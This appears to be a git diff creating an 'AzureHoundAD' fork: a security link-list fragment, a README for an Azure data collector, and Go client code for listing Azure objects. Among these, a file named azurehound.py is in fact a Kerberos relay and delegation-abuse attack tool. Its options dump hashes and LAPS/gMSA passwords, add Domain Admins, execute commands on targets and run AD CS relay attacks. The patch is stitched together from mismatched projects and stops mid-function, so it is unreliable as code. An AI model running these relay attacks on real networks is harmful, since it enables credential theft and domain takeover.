Information Security Reference That Doesn't Suck -[IOC](https://github.com/sroberts/awesome-iocs) | Collection of sources of indicators of compromise -[Linux Kernel Exploitation](https://github.com/xairy/linux-kernel-exploitation) | A bunch of links related to Linux kernel fuzzing and exploitation -[Lockpicking](https://github.com/meitar/awesome-lockpicking) | Resources relating to the security and compromise of locks, safes, and keys. -[Machine Learning for Cyber Security](https://github.com/jivoi/awesome-ml-for-cybersecurity) | Curated list of tools and resources related to the use of machine learning for cyber security -[Payloads](https://github.com/foospidy/payloads) | Collection of web attack payloads -[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) | List of useful payloads and bypass for Web Application Security and Pentest/CTF -[Pentest Cheatsheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) | Collection of the cheat sheets useful for pentesting -[Pentest Wiki](https://github.com/nixawk/pentest-wiki) | A free online security knowledge library for pentesters / researchers -[Probable Wordlists](https://github.com/berzerk0/Probable-Wordlists) | Wordlists sorted by probability originally created for password generation and testing -[Resource List](https://github.com/FuzzySecurity/Resource-List) | Collection of useful GitHub projects loosely categorised -[Reverse Engineering](https://github.com/onethawt/reverseengineering-reading-list) | List of Reverse Engineering articles, books, and papers -[RFSec-ToolKit](https://github.com/cn0xroot/RFSec-ToolKit) | Collection of Radio Frequency Communication Protocol Hacktools -[Security Cheatsheets](https://github.com/andrewjkerr/security-cheatsheets) | Collection of cheatsheets for various infosec tools and topics -[Security List](https://github.com/zbetcheckin/Security_list) | Great security list for fun and profit -[Shell](https://github.com/alebcay/awesome-shell) | List of awesome command-line frameworks, toolkits, guides and gizmos to make complete use of shell -[ThreatHunter-Playbook](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook) | A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns -[Web Security](https://github.com/qazbnm456/awesome-web-security) | Curated list of Web Security materials and resources -[Vulhub](https://github.com/vulhub/vulhub) | Pre-Built Vulnerable Environments Based on Docker-Compose +# AzureHoundAD + +The BloodHound data collector for Microsoft Azure + +![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/byt3n33dl3/AzureHoundAD/build.yml) +![GitHub release (latest SemVer)](https://img.shields.io/github/v/release/byt3n33dl3/AzureHoundAD) +![GitHub all releases](https://img.shields.io/github/downloads/byt3n33dl3/AzureHoundAD/total) +[![Documentation](https://img.shields.io/static/v1?label=&message=documentation&color=blue)](https://pkg.go.dev/github.com/byt3n33dl3/azurehoundad) + +## Get AzureHoundAD + +#### Release Binaries + +Download the appropriate binary for your platform from one of our [Releases](https://github.com/byt3n33dl3/AzureHoundAD/releases). + +#### Rolling Release + +The rolling release contains pre-built binaries that are automatically kept up-to-date with the `main` branch and can be downloaded from +[here](https://github.com/byt3n33dl3/AzureHoundAD/releases/tag/rolling). + +> **Warning:** The rolling release may be unstable. + +## Compiling + +#### Prerequisites + +- [Go 1.18](https://go.dev/dl) or later + +To build this project from source run the following: + +```sh +go build -ldflags="-s -w -X github.com/byt3n33dl3/AzureHoundAD/v2/constants.Version=`git describe tags --exact-match 2> /dev/null || git rev-parse HEAD`" +``` + +## Usage + +#### Quickstart + +**Print all Azure Tenant data to stdout** + +```sh +❯ azurehound list -u "$USERNAME" -p "$PASSWORD" -t "$TENANT" +``` + +**Print all Azure Tenant data to file** + +```sh +❯ azurehound list -u "$USERNAME" -p "$PASSWORD" -t "$TENANT" -o "mytenant.json" +``` + +**Configure and start data collection service for BloodHound Enterprise** + +```sh +❯ azurehound configure +(follow prompts) + +❯ azurehound start +``` + +## CLI + +``` +❯ azurehound --help +AzureHound vx.x.x +Created by the BloodHound Enterprise team - https://bloodhoundenterprise.io + +The official tool for collecting Azure data for BloodHound and BloodHound Enterprise + +Usage: + azurehound [command] + +Available Commands: + completion Generate the autocompletion script for the specified shell + configure Configure AzureHound + help Help about any command + list Lists Azure Objects + start Start Azure data collection service for BloodHound Enterprise + +Flags: + -c, --config string AzureHound configuration file (default: /Users/dlees/.config/azurehound/config.json) + -h, --help help for azurehound + --json Output logs as json + -j, --jwt string Use an acquired JWT to authenticate into Azure + --log-file string Output logs to this file + --proxy string Sets the proxy URL for the AzureHound service + -r, --refresh-token string Use an acquired refresh token to authenticate into Azure + -v, --verbosity int AzureHound verbosity level (defaults to 0) [Min: -1, Max: 2] + --version version for azurehound + +Use "azurehound [command] --help" for more information about a command. +``` diff --git a/azurehound.py b/azurehound.py new file mode 100644 index 0000000..8cc028e --- /dev/null +++ b/azurehound.py @@ -0,0 +1,261 @@ +#!/usr/bin/env python +#################### +# +# Copyright (c) 2020 Dirk-jan Mollema (@_dirkjan) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. +# +#################### +# +# This tool is based on ntlmrelayx, part of Impacket +# Copyright (c) 2013-2018 SecureAuth Corporation +# +# Impacket is provided under under a slightly modified version +# of the Apache Software License. +# See https://github.com/SecureAuthCorp/impacket/blob/master/LICENSE +# for more information. +# +# +# Ntlmrelayx authors: +# Alberto Solino (@agsolino) +# Dirk-jan Mollema / Outsider Security (www.outsidersecurity.nl) +# + +import argparse +import sys +import binascii +import logging + +from impacket.examples import logger +from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS +from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher + +from lib.servers import SMBRelayServer, HTTPKrbRelayServer, DNSRelayServer +from lib.utils.config import KrbRelayxConfig + +RELAY_SERVERS = ( SMBRelayServer, HTTPKrbRelayServer, DNSRelayServer ) + +def stop_servers(threads): + todelete = [] + for thread in threads: + if isinstance(thread, RELAY_SERVERS): + thread.server.shutdown() + todelete.append(thread) + # Now remove threads from the set + for thread in todelete: + threads.remove(thread) + del thread + +def main(): + def start_servers(options, threads): + for server in RELAY_SERVERS: + #Set up config + c = KrbRelayxConfig() + c.setProtocolClients(PROTOCOL_CLIENTS) + c.setTargets(targetSystem) + c.setExeFile(options.e) + c.setCommand(options.c) + c.setEnumLocalAdmins(options.enum_local_admins) + c.setEncoding(codec) + c.setMode(mode) + c.setAttacks(PROTOCOL_ATTACKS) + c.setLootdir(options.lootdir) + c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid) + c.setIPv6(options.ipv6) + c.setWpadOptions(options.wpad_host, options.wpad_auth_num) + c.setSMB2Support(not options.no_smb2support) + c.setInterfaceIp(options.interface_ip) + if options.krbhexpass and not options.krbpass: + c.setAuthOptions(options.aesKey, options.hashes, options.dc_ip, binascii.unhexlify(options.krbhexpass), options.krbsalt, True) + else: + c.setAuthOptions(options.aesKey, options.hashes, options.dc_ip, options.krbpass, options.krbsalt, False) + c.setKrbOptions(options.format, options.victim) + c.setIsADCSAttack(options.adcs) + c.setADCSOptions(options.template) + + #If the redirect option is set, configure the HTTP server to redirect targets to SMB + if server is HTTPKrbRelayServer and options.r is not None: + c.setMode('REDIRECT') + c.setRedirectHost(options.r) + + s = server(c) + s.start() + threads.add(s) + return c + + # Init the example's logger theme + logger.init() + + #Parse arguments + parser = argparse.ArgumentParser(add_help=False, + description="Kerberos relay and unconstrained delegation abuse tool. " + "By @_dirkjan / dirkjanm.io") + parser._optionals.title = "Main options" + + #Main arguments + parser.add_argument("-h", "--help", action="help", help='show this help message and exit') + parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') + parser.add_argument('-t', "--target", action='store', metavar = 'TARGET', help='Target to attack, ' + 'since this is Kerberos, only HOSTNAMES are valid. Example: smb://server:445 If unspecified, will store tickets for later use.') + parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or ' + 'full URL, one per line') + parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list ' + 'automatically (only valid with -tf)') + + # Interface address specification + parser.add_argument('-ip', '--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to ' + 'bind SMB and HTTP servers',default='') + + parser.add_argument('-r', action='store', metavar='SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER') + parser.add_argument('-l', '--lootdir', action='store', type=str, required=False, metavar='LOOTDIR', default='.', help='Loot ' + 'directory in which gathered loot (TGTs or dumps) will be stored (default: current directory).') + parser.add_argument('-f', '--format', default='ccache', choices=['ccache', 'kirbi'], action='store',help='Format to store tickets in. Valid: ccache (Impacket) or kirbi' + ' (Mimikatz format) default: ccache') + parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default ' + '"%s"). If errors are detected, run chcp.com at the target, ' + 'map the result with ' + 'https://docs.python.org/2.4/lib/standard-encodings.html and then execute ntlmrelayx.py ' + 'again with -codec and the corresponding codec ' % sys.getdefaultencoding()) + parser.add_argument('-no-smb2support', action="store_false", default=False, help='Disable SMB2 Support') + + parser.add_argument('-wh', '--wpad-host', action='store', help='Enable serving a WPAD file for Proxy Authentication attack, ' + 'setting the proxy host to the one supplied.') + parser.add_argument('-wa', '--wpad-auth-num', action='store', help='Prompt for authentication N times for clients without MS16-077 installed ' + 'before serving a WPAD file.') + parser.add_argument('-6', '--ipv6', action='store_true', help='Listen on both IPv6 and IPv4') + + # Authentication arguments + group = parser.add_argument_group('Kerberos Keys (of your account with unconstrained delegation)') + group.add_argument('-p', '--krbpass', action="store", metavar="PASSWORD", help='Account password') + group.add_argument('-hp', '--krbhexpass', action="store", metavar="HEXPASSWORD", help='Hex-encoded password') + group.add_argument('-s', '--krbsalt', action="store", metavar="USERNAME", help='Case sensitive (!) salt. Used to calculate Kerberos keys.' + 'Only required if specifying password instead of keys.') + group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') + group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication ' + '(128 or 256 bits)') + group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If ' + 'ommited it use the domain part (FQDN) specified in the target parameter') + + #SMB arguments + smboptions = parser.add_argument_group("SMB attack options") + + smboptions.add_argument('-e', action='store', required=False, metavar='FILE', help='File to execute on the target system. ' + 'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)') + smboptions.add_argument('-c', action='store', type=str, required=False, metavar='COMMAND', help='Command to execute on ' + 'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same ' + 'directory).') + smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)') + + #LDAP options + ldapoptions = parser.add_argument_group("LDAP attack options") + ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information') + ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin') + ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks') + ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks') + ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one') + ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account') + ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account') + ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name') + ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user') + ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user') + ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services and certificate templates info') + + # AD CS options + adcsoptions = parser.add_argument_group("AD CS attack options") + adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack') + adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, help='AD CS template. Defaults to Machine or User whether relayed account name ends with `$`. Relaying a DC should require specifying `DomainController`') + adcsoptions.add_argument('-v', "--victim", action='store', metavar = 'TARGET', help='Victim username or computername$, to request the correct certificate name.') + + try: + options = parser.parse_args() + except Exception as e: + logging.error(str(e)) + sys.exit(1) + + if options.debug is True: + logging.getLogger().setLevel(logging.DEBUG) + logging.getLogger('impacket.smbserver').setLevel(logging.DEBUG) + else: + logging.getLogger().setLevel(logging.INFO) + logging.getLogger('impacket.smbserver').setLevel(logging.ERROR) + + # Let's register the protocol clients we have + # ToDo: Do this better somehow + from lib.clients import PROTOCOL_CLIENTS + + + if options.codec is not None: + codec = options.codec + else: + codec = sys.getdefaultencoding() + + if options.target is not None: + logging.info("Running in attack mode to single host") + mode = 'ATTACK' + targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS) + else: + if options.tf is not None: + #Targetfile specified + logging.info("Running in attack mode to hosts in targetfile") + targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS) + mode = 'ATTACK' + else: + logging.info("Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.") + targetSystem = None + mode = 'EXPORT' + + if not options.krbpass and not options.krbhexpass and not options.hashes and not options.aesKey: + logging.info("Running in kerberos relay mode because no credentials were specified.") + if mode == 'EXPORT': + logging.error('You need to specify at least one relay target, or specify credentials to run in unconstrained delegation mode') + return + mode = 'RELAY' + else: + logging.info("Running in unconstrained delegation abuse mode using the specified credentials.") + + if options.r is not None: + logging.info("Running HTTP server in redirect mode") + + if targetSystem is not None and options.w: + watchthread = TargetsFileWatcher(targetSystem) + watchthread.start() + + threads = set() + + c = start_servers(options, threads) + + print("") + logging.info("Servers started, waiting for connections") + try: + sys.stdin.read() + except KeyboardInterrupt: + pass + else: + pass + + for s in threads: + del s + + sys.exit(0) + + + +# Process command-line arguments. +if __name__ == '__main__': + main() diff --git a/client/app_role_assignments.go b/client/app_role_assignments.go new file mode 100644 index 0000000..c497724 --- /dev/null +++ b/client/app_role_assignments.go @@ -0,0 +1,43 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// GetAzureADAppRoleAssignments https://learn.microsoft.com/en-us/graph/api/serviceprincipal-list-approleassignedto?view=graph-rest-1.0 +func (s *azureClient) ListAzureADAppRoleAssignments(ctx context.Context, servicePrincipalId string, params query.GraphParams) <-chan AzureResult[azure.AppRoleAssignment] { + var ( + out = make(chan AzureResult[azure.AppRoleAssignment]) + path = fmt.Sprintf("/%s/servicePrincipals/%s/appRoleAssignedTo", constants.GraphApiVersion, servicePrincipalId) + ) + + if params.Top == 0 { + params.Top = 999 + } + + go getAzureObjectList[azure.AppRoleAssignment](s.msgraph, ctx, path, params, out) + + return out +} diff --git a/client/apps.go b/client/apps.go new file mode 100644 index 0000000..80ce4fa --- /dev/null +++ b/client/apps.go @@ -0,0 +1,61 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "encoding/json" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureADApps https://learn.microsoft.com/en-us/graph/api/application-list?view=graph-rest-beta +func (s *azureClient) ListAzureADApps(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Application] { + var ( + out = make(chan AzureResult[azure.Application]) + path = fmt.Sprintf("/%s/applications", constants.GraphApiVersion) + ) + + if params.Top == 0 { + params.Top = 99 + } + + go getAzureObjectList[azure.Application](s.msgraph, ctx, path, params, out) + + return out +} + +// ListAzureADAppOwners https://learn.microsoft.com/en-us/graph/api/application-list-owners?view=graph-rest-beta +func (s *azureClient) ListAzureADAppOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] { + + var ( + out = make(chan AzureResult[json.RawMessage]) + path = fmt.Sprintf("/%s/applications/%s/owners", constants.GraphApiBetaVersion, objectId) + ) + + if params.Top == 0 { + params.Top = 99 + } + + go getAzureObjectList[json.RawMessage](s.msgraph, ctx, path, params, out) + + return out +} diff --git a/client/automation_accounts.go b/client/automation_accounts.go new file mode 100644 index 0000000..67e8a23 --- /dev/null +++ b/client/automation_accounts.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureAutomationAccounts https://learn.microsoft.com/en-us/rest/api/automation/automation-account/list?view=rest-automation-2021-06-22 +func (s *azureClient) ListAzureAutomationAccounts(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.AutomationAccount] { + var ( + out = make(chan AzureResult[azure.AutomationAccount]) + path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Automation/automationAccounts", subscriptionId) + params = query.RMParams{ApiVersion: "2021-06-22"} + ) + + go getAzureObjectList[azure.AutomationAccount](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/client.go b/client/client.go new file mode 100644 index 0000000..80e6401 --- /dev/null +++ b/client/client.go @@ -0,0 +1,232 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +//go:generate go run go.uber.org/mock/mockgen -destination=./mocks/client.go -package=mocks . AzureClient + +import ( + "context" + "encoding/json" + "fmt" + "net/http" + "net/url" + + "github.com/bloodhoundad/azurehound/v2/client/config" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/client/rest" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" +) + +func NewClient(config config.Config) (AzureClient, error) { + if msgraph, err := rest.NewRestClient(config.GraphUrl(), config); err != nil { + return nil, err + } else if resourceManager, err := rest.NewRestClient(config.ResourceManagerUrl(), config); err != nil { + return nil, err + } else { + if config.JWT != "" { + if aud, err := rest.ParseAud(config.JWT); err != nil { + return nil, err + } else if aud == config.GraphUrl() { + return initClientViaGraph(msgraph, resourceManager) + } else if aud == config.ResourceManagerUrl() { + if body, err := rest.ParseBody(config.JWT); err != nil { + return nil, err + } else { + return initClientViaRM(msgraph, resourceManager, body["tid"]) + } + } else { + return nil, fmt.Errorf("error: invalid token audience") + } + } else { + return initClientViaGraph(msgraph, resourceManager) + } + } +} + +func initClientViaRM(msgraph, resourceManager rest.RestClient, tid interface{}) (AzureClient, error) { + client := &azureClient{ + msgraph: msgraph, + resourceManager: resourceManager, + } + if result, err := client.GetAzureADTenants(context.Background(), true); err != nil { + return nil, err + } else { + for _, tenant := range result.Value { + if tenant.TenantId == tid.(string) { + client.tenant = tenant + break + } + } + return client, nil + } +} + +func initClientViaGraph(msgraph, resourceManager rest.RestClient) (AzureClient, error) { + client := &azureClient{ + msgraph: msgraph, + resourceManager: resourceManager, + } + if org, err := client.GetAzureADOrganization(context.Background(), nil); err != nil { + return nil, err + } else { + client.tenant = org.ToTenant() + return client, nil + } +} + +type AzureResult[T any] struct { + Error error + Ok T +} + +func getAzureObjectList[T any](client rest.RestClient, ctx context.Context, path string, params query.Params, out chan AzureResult[T]) { + defer panicrecovery.PanicRecovery() + defer close(out) + + var ( + errResult AzureResult[T] + nextLink string + ) + + for { + var ( + list struct { + CountGraph int `json:"@odata.count,omitempty"` // The total count of all graph results + NextLinkGraph string `json:"@odata.nextLink,omitempty"` // The URL to use for getting the next set of graph values. + ContextGraph string `json:"@odata.context,omitempty"` + NextLinkRM string `json:"nextLink,omitempty"` // The URL to use for getting the next set of rm values. + Value []T `json:"value"` // A list of azure values + } + res *http.Response + err error + ) + + if nextLink != "" { + if nextUrl, err := url.Parse(nextLink); err != nil { + errResult.Error = err + _ = pipeline.Send(ctx.Done(), out, errResult) + return + } else { + paramsMap := make(map[string]string) + if params != nil { + paramsMap = params.AsMap() + } + if req, err := rest.NewRequest(ctx, "GET", nextUrl, nil, paramsMap, nil); err != nil { + errResult.Error = err + _ = pipeline.Send(ctx.Done(), out, errResult) + return + } else if res, err = client.Send(req); err != nil { + errResult.Error = err + _ = pipeline.Send(ctx.Done(), out, errResult) + return + } + } + } else { + if res, err = client.Get(ctx, path, params, nil); err != nil { + errResult.Error = err + _ = pipeline.Send(ctx.Done(), out, errResult) + return + } + } + + if err := rest.Decode(res.Body, &list); err != nil { + errResult.Error = err + _ = pipeline.Send(ctx.Done(), out, errResult) + return + } else { + for _, u := range list.Value { + if ok := pipeline.Send(ctx.Done(), out, AzureResult[T]{Ok: u}); !ok { + return + } + } + } + + if list.NextLinkRM == "" && list.NextLinkGraph == "" { + break + } else if list.NextLinkGraph != "" { + nextLink = list.NextLinkGraph + } else if list.NextLinkRM != "" { + nextLink = list.NextLinkRM + } + } +} + +type azureClient struct { + msgraph rest.RestClient + resourceManager rest.RestClient + tenant azure.Tenant +} + +type AzureGraphClient interface { + GetAzureADOrganization(ctx context.Context, selectCols []string) (*azure.Organization, error) + + ListAzureADGroups(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Group] + ListAzureADGroupMembers(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] + ListAzureADGroupOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] + ListAzureADAppOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] + ListAzureADApps(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Application] + ListAzureADUsers(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.User] + ListAzureADRoleAssignments(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.UnifiedRoleAssignment] + ListAzureADRoles(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Role] + ListAzureADServicePrincipalOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] + ListAzureADServicePrincipals(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.ServicePrincipal] + ListAzureDeviceRegisteredOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] + ListAzureDevices(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Device] + ListAzureADAppRoleAssignments(ctx context.Context, servicePrincipalId string, params query.GraphParams) <-chan AzureResult[azure.AppRoleAssignment] +} + +type AzureResourceManagerClient interface { + GetAzureADTenants(ctx context.Context, includeAllTenantCategories bool) (azure.TenantList, error) + + ListRoleAssignmentsForResource(ctx context.Context, resourceId string, filter, tenantId string) <-chan AzureResult[azure.RoleAssignment] + ListAzureADTenants(ctx context.Context, includeAllTenantCategories bool) <-chan AzureResult[azure.Tenant] + ListAzureContainerRegistries(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.ContainerRegistry] + ListAzureWebApps(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.WebApp] + ListAzureManagedClusters(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.ManagedCluster] + ListAzureVMScaleSets(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.VMScaleSet] + ListAzureKeyVaults(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.KeyVault] + ListAzureManagementGroups(ctx context.Context, skipToken string) <-chan AzureResult[azure.ManagementGroup] + ListAzureManagementGroupDescendants(ctx context.Context, groupId string, top int32) <-chan AzureResult[azure.DescendantInfo] + ListAzureResourceGroups(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.ResourceGroup] + ListAzureSubscriptions(ctx context.Context) <-chan AzureResult[azure.Subscription] + ListAzureVirtualMachines(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.VirtualMachine] + ListAzureStorageAccounts(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.StorageAccount] + ListAzureStorageContainers(ctx context.Context, subscriptionId string, resourceGroupName string, saName string, filter string, includeDeleted string, maxPageSize string) <-chan AzureResult[azure.StorageContainer] + ListAzureAutomationAccounts(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.AutomationAccount] + ListAzureLogicApps(ctx context.Context, subscriptionId string, filter string, top int32) <-chan AzureResult[azure.LogicApp] + ListAzureFunctionApps(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.FunctionApp] +} + +type AzureClient interface { + AzureGraphClient + AzureResourceManagerClient + + TenantInfo() azure.Tenant + CloseIdleConnections() +} + +func (s azureClient) TenantInfo() azure.Tenant { + return s.tenant +} + +func (s azureClient) CloseIdleConnections() { + s.msgraph.CloseIdleConnections() + s.resourceManager.CloseIdleConnections() +} diff --git a/client/config/config.go b/client/config/config.go new file mode 100644 index 0000000..3b68c1a --- /dev/null +++ b/client/config/config.go @@ -0,0 +1,107 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package config + +import ( + "strings" + + "github.com/bloodhoundad/azurehound/v2/constants" +) + +type Config struct { + ApplicationId string // The Application Id that the Azure app registration portal assigned when the app was registered. + Authority string // The Azure ActiveDirectory Authority URL + ClientSecret string // The Application Secret that was generated for the app in the app registration portal. + ClientCert string // The certificate uploaded to the app registration portal." + ClientKey string // The key for a certificate uploaded to the app registration portal." + ClientKeyPass string // The passphrase to use in conjuction with the associated key of a certificate uploaded to the app registration portal." + Graph string // The Microsoft Graph URL + JWT string // The JSON web token that will be used to authenticate requests sent to Azure APIs + Management string // The Azure ResourceManager URL + MgmtGroupId []string // The Management Group Id to use as a filter + Password string // The password associated with the user principal name associated with the Azure portal. + ProxyUrl string // The forward proxy url + RefreshToken string // The refresh token that will be used to authenticate requests sent to Azure APIs + Region string // The region of the Azure Cloud deployment. + SubscriptionId []string // The Subscription Id(s) to use as a filter + Tenant string // The directory tenant that you want to request permission from. This can be in GUID or friendly name format + Username string // The user principal name associated with the Azure portal. +} + +func AuthorityUrl(region string, defaultUrl string) string { + switch region { + case constants.China: + return constants.AzureChina().ActiveDirectoryAuthority + case constants.Cloud: + return constants.AzureCloud().ActiveDirectoryAuthority + case constants.Germany: + return constants.AzureGermany().ActiveDirectoryAuthority + case constants.USGovL4: + return constants.AzureUSGovernment().ActiveDirectoryAuthority + case constants.USGovL5: + return constants.AzureUSGovernmentL5().ActiveDirectoryAuthority + default: + return defaultUrl + } +} + +func (s Config) AuthorityUrl() string { + return AuthorityUrl(s.Region, s.Authority) +} + +func GraphUrl(region string, defaultUrl string) string { + switch region { + case constants.China: + 